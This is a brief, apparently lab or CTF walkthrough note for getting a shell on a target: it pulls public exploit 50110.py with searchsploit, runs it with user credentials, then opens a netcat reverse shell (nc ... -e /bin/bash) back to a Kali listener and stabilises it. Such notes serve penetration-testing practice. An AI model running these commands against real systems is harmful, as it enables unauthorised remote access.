Exploit available
[1] searchsploit -m 50110.py
[2]chmod +x 50110.py
[3]Just follow instructions (need to supply IP target, username and password of one user)
Once you run the exploit get command execution with low level shell , upgrade with:
nc 10.10.10.11:1234 -e /bin/bash (From low level shell...11 is kali IP) b) nc -nvlp 1234 (From kali host)
nc 10.10.10.11:1234 -e /bin/bash
nc -nvlp 1234
[4] Stabilize shell with python
Last updated 3 years ago